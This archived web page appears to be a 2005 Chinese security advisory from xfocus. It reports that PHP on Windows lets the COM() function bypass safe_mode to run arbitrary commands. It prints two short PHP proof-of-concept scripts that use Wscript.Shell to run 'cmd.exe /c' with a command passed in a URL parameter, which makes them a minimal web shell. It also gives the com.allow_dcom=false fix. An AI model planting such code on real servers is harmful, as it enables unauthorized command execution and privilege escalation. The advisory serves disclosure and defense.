📄 787.html
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>PHP COM组件调用绕过安全模式执行任意文件漏洞 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography,kEvin1986,Saiy,我非我,wofeiwo,PHP,安全模式,执行任意命令,提升权限" />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
<div class="searchBox">
<form name="searchform" action="http://www.google.com/search" method="get">
<input type="hidden" name="domains" value="www.xfocus.net">
<input type="hidden" name="sitesearch" value="www.xfocus.net">
<input type="text" name="q" size="20">
<input type="submit" name="btnG" value="Google Search">
</form>
</div>
<img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
<img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
<a href="../../index.html" class="plain">首页</a>
<a href="../../releases/index.html" class="plain">焦点原创</a>
<a href="../../articles/index.html" class="selected">安全文摘</a>
<a href="../../tools/index.html" class="plain">安全工具</a>
<a href="../../vuls/index.html" class="plain">安全漏洞</a>
<a href="../../projects/index.html" class="plain">焦点项目</a>
<a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a>
<a href="../../about/index.html" class="plain">关于我们</a>
</div>
<div class="personalBar">
<a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a>
</div>
<table class="columns">
<tr>
<td class="left">
<div class="box">
<h5> 文章分类 </h5>
<div class="body">
<div class="content odd">
<div style="white-space: nowrap;">
<img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'><b>漏洞分析 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
</div>
</div>
</div>
</div>
<div class="box">
<h5> 文章推荐 </h5>
<div class="body">
<div class="content odd">
<img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
</div>
</div>
</div>
</td>
<td class="main">
<h1>PHP COM组件调用绕过安全模式执行任意文件漏洞</h1><br>创建时间:2005-03-22<br>文章属性:原创<br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=76923'>kevin1986</a> (kevin7c2_at_yahoo.com.cn)<br><br>发现日期:2005-02-10<br />
<br />
受影响的系统:<br />
Windows 下支持COM()函数的PHP版本<br />
<br />
发现人:<br />
Saiy\我非我 From <a href='http://www.wrsky.com' target='_blank'>http://www.wrsky.com</a> & kEvin1986<br />
Saiy:dawangs_at_etang.com<br />
kEvin1986:Garnett1986_at_hotmail.com<br />
我非我:wofeiwo_at_bugkidz.org<br />
<br />
我非我:<br />
<br />
描述:<br />
<br />
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令.<br />
漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com.allow_dcom的设置依旧是为true.以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令.如果是默认的Apache设置或者Web服务器以Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限.<br />
<br />
测试程序:<br />
-----------------------------------------------------------------<br />
<br />
警 告<br />
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<br />
<br />
/*需要Windows Script Host 5.6支持*/<br />
<?php<br />
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");<br />
$phpexec=$phpwsh->exec("cmd.exe /c $cmd");<br />
$execoutput=$wshexec->stdout();<br />
$result=$execoutput->readall();<br />
echo $result;<br />
?><br />
<br />
/*Windows Script Host 5.6以下版本支持*/<br />
<?php<br />
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");<br />
$phpwsh->run("cmd.exe /c $cmd > c:\\inetpub\\wwwroot\\result.txt");<br />
?><br />
<br />
将以上代码保存成*.php文件之后可以在浏览器中执行<br />
<a href='http://www.target.com/simple.php?cmd=[Command]' target='_blank'>http://www.target.com/simple.php?cmd=[Command]</a><br />
<br />
---------------------------------------------------------------<br />
补丁:<br />
目前PHP官方未回复发现者的信件且未发布任何相关补丁.<br />
<br />
建议:<br />
在设置安全模式之后,将 com.allow_dcom=true 设置为 com.allow_dcom=false即可.<br />
<br />
感谢:<br />
<a href='http://www.4ngel.net' target='_blank'>www.4ngel.net</a>安全小组的积极测试.
</td>
</tr>
</table>
<div class="footer">
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -